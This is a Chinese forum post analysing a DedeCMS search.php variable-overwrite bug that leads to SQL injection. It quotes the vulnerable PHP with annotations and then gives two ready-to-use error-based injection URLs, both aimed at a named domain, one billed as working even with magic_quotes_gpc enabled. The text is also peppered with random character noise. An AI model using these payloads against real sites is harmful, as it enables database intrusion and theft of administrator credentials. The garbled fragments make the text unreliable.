微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.7 H5 n6 C0 f; L& o- F0 F" s. D
作者: c4rp3nt3r@0x50sec.org1 E& @1 ^' F* ]0 Q6 ?9 ?
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
" l7 I7 S$ T8 H( l8 v- Q " c! P% ]) I# g% b
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
3 Y/ G6 f$ j# d( \( Q
/ K0 m/ I" d$ I" M2 M============- ^, S( e% b3 M( H* B0 e! T
' E# v; k0 D/ I; c1 W9 w 3 ~& x( F+ o/ c* R3 ^
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
) v' S5 b7 S6 W* m4 I 4 N5 l* T% g7 O
require_once(dirname(__FILE__).”/../include/common.inc.php”);1 r4 n" N# l" U1 u, n3 Y4 {
require_once(DEDEINC.”/arc.searchview.class.php”);9 A$ O5 u8 {, `7 X" Y \
8 Y# j0 x3 t; _/ s& v0 O5 o- k$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;+ N/ D# v; w% E; e( ]( X
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;) m: T, |- k- }. O$ K
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
& \5 n% p& U. z/ s. \$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;' l) p& x0 V! u3 i8 t% K- Z6 W, V
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
8 {% |2 g {0 C7 L
: P M' O/ R/ \2 c3 \: s! zif(!isset($orderby)) $orderby=”;
( I( W/ G; D2 j+ D2 Nelse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);& Y2 o; M* K, p+ R: s
3 M5 y7 r1 k( o$ F9 |
+ r; r# Q6 }( S) {) n% V8 dif(!isset($searchtype)) $searchtype = ‘titlekeyword’;- Y9 q( n. B3 j9 J1 b; j4 C
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
2 M+ I* |2 l+ P ) y- b& w' s+ \* m* h
if(!isset($keyword)){3 a1 ]. L# n" W, G$ a4 x
if(!isset($q)) $q = ”;5 c+ [( N2 [: o
$keyword=$q;: s9 D8 t: b8 k' Z
}
! Z. \# C4 r3 g& w% M1 r4 m1 e 1 c2 \% |+ j+ H
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));. {/ `/ c. A/ Z% J/ ?
- [! y5 S; v5 Y
//查找栏目信息6 f5 l' c7 W7 T
if(empty($typeid)), r9 c* Q" T6 I
{' M' M5 u+ K. h5 Z2 R5 G, {
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;
8 m' E* n1 h T6 H4 ~: n) i5 u/ r if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )
+ D5 g7 p/ V! n N& c2 j! @ {! K% x: H% x/ S- {5 q- \+ Z
$fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
# Q/ M8 L- o; K$ V fwrite($fp, “<”.”?php\r\n”);
; k) n9 L p8 g3 z7 N7 S( j $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);
1 Y6 W7 C7 q0 I8 ] $dsql->Execute();
. P8 u1 ~4 P3 W6 Z, h while($row = $dsql->GetArray())
" t8 N3 i4 G0 k1 P7 A0 g: } {
1 `" R O" @: E* P fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);/ j+ `' t( \' `5 p: w' |1 M" F
}6 w$ w) K$ H4 Z6 O
fwrite($fp, ‘?’.'>’);
1 J5 T# z* N7 E$ k' [1 h, S6 H v fclose($fp);
4 e7 B0 r: W9 b, g4 ^' g5 E; e- q }0 M( G, V2 V8 Y; ?; n$ D
//引入栏目缓存并看关键字是否有相关栏目内容
5 W/ V) {/ l4 }6 L2 V+ e i require_once($typenameCacheFile);
/ w, K9 \) y) I) S/ f//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个: b- J' `, \; d8 V
//
0 }& J6 n, H$ @ if(isset($typeArr) && is_array($typeArr)), \7 C2 _% ^8 D, H$ ^/ c0 _9 }* |
{
9 E7 Y! o) T0 Q q" a/ _ foreach($typeArr as $id=>$typename)0 J+ x; W6 [7 j4 l# u
{* v0 i. h: P+ m# X I
$ w/ j4 r3 g$ y( w; ` <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过- b( G" I) g" u/ H: P; |8 Z
if($keyword != $keywordn)2 v& ^' }7 T. n
{
7 c7 w4 n. y% a1 B+ T $keyword = $keywordn;
% Y: D" m% ?( R) V E6 h: | <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设 ?. x: @) P8 `9 [# Q5 A8 |
break;
0 R. L: l8 B( s P0 ^) T }
, T/ C# F+ S* Q, x& z& `* J9 B }
0 p& E* X0 M+ |+ C/ t# A }
8 }& x& l3 O6 o4 W: ^! D) v}
& g6 N7 z5 p: L& z5 { r然后plus/search.php文件下面定义了一个 Search类的对象 .( T/ @) t* d+ s
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.
8 ~/ D3 W r0 N$this->TypeLink = new TypeLink($typeid);
2 d. z/ T7 O4 a: V; E. `0 h+ R+ \ C g
1 r8 Z! t+ s/ p- \) pTypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.
6 E) X) g/ F. L) ^
8 A4 I3 y6 A' d5 d6 y, Oclass TypeLink
5 z# f* q& h6 s$ N9 i7 n. `. c{) k4 _% t2 s' ?9 H0 {7 |% v& o
var $typeDir;
& v! Z4 Z$ H1 y& \ var $dsql;7 g* W$ }3 i" v) n
var $TypeID;; l; W4 V$ d+ {% f% w( _) L3 _
var $baseDir;
% i- `. G6 v' O1 Z! U0 L! | var $modDir;% Y% P% a" V7 A: \9 I
var $indexUrl;; \) X3 A, ]: i! v. @. |
var $indexName;$ I7 Z) B3 F& O4 M" K! j$ q
var $TypeInfos;
; V. \5 H% d( t" }, K" z var $SplitSymbol;0 ~" I( ~( s# o' ? u5 x
var $valuePosition;3 B5 s$ S U2 V
var $valuePositionName;2 [% z5 M2 G2 @; \8 y# n! I1 Q
var $OptionArrayList;//构造函数///////- r) N% G% E9 G! W0 g9 K
//php5构造函数4 i; f/ B5 R' b# {
function __construct($typeid)
1 ~' L; c/ m/ `! ^% } {
9 z C T& x& R; O $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];1 A k$ Y$ q& i- F/ B% J* c/ Y& x! E' L, i
$this->indexName = $GLOBALS['cfg_indexname']; x- }( w0 z( N8 t2 u
$this->baseDir = $GLOBALS['cfg_basedir'];! ~ U; z# u3 q+ A3 U+ s
$this->modDir = $GLOBALS['cfg_templets_dir'];
5 [, U/ j+ b6 x- [* I $this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
3 |5 S& }9 a7 y% c. [8 @+ c+ V $this->dsql = $GLOBALS['dsql'];
; x9 \; Y& G0 c. K* n $this->TypeID = $typeid; A- Z% F( M2 O7 J, T
$this->valuePosition = ”;. v: D9 c' q" h- `- W
$this->valuePositionName = ”;
' B# p) ?7 G8 l7 ` $this->typeDir = ”;
" C' a- Y. t, D+ b; ?5 _ $this->OptionArrayList = ”;
& I$ Q h1 i# k! m& _1 O, u) k 0 s. r0 s/ \4 ~
//载入类目信息: `' `& |5 \; L; Z% K
2 G; i+ B6 {# @$ e+ n# _: {
<font color=”Red”>$query = “SELECT tp.*,ch.typename as
! \" B- n# n B Vctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
7 o! `; I; e: C+ F' o6 V`#@__channeltype` ch; G- s+ T" O) S. K! Y/ L5 d2 d
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿0 y. }5 c$ `# G, H
( B2 h7 g b7 d0 \: l, [) x+ Y* ^
if($typeid > 0)
, {" z5 i# L6 @2 S+ {" R {
* W7 k3 z% ~; z* P& R7 e \: m $this->TypeInfos = $this->dsql->GetOne($query);4 D. E6 R' I$ Q# L4 k( }; j
利用代码一 需要 即使magic_quotes_gpc = Off3 {) n4 T4 e0 U7 [' T1 `
& f* v# y: ? X% _" u3 b; Q, O6 Zwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title, T9 E9 _. X3 B6 N/ X# o0 K; }
% Y; N6 a% d4 T" Y这只是其中一个利用代码… Search 类的构造函数再往下) j1 l6 y# c" A7 B$ a' {/ \3 S1 V
% z# H b3 W5 k2 a S……省略
) o! ^4 A; K F! ]4 K7 q* s, G+ N$this->TypeID = $typeid;
, w/ e2 i5 D* |……省略
; r) R& z. J/ P) j7 \' v$ pif($this->TypeID==”0″){: a/ L" K# T3 ^1 w* m4 q
$this->ChannelTypeid=1;
& h, ]4 c* _1 ?7 N6 c }else{- ^( n" V6 ?5 n" y. N
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
, z D1 j( X% A! [8 l+ d//现在不鸡肋了吧亲…
, d/ ~' _' B3 D6 N1 d' I $this->ChannelTypeid=$row['channeltype'];9 p) c5 N0 O4 [$ m1 D
6 E& m& p' G+ e5 p2 R }/ @3 F% [% W' \# ]% D! e
利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.2 W) A! Z/ `( d% h- M, e) S
0 O$ q. A4 l2 k1 J+ `www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title* H6 Q5 T: A S4 r2 U# T
2 z/ X* D2 O/ h4 ~" i如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站
# x# t( H7 W. v: N* A |
发表于 2013-1-19 08:18:56
收藏
支持
反对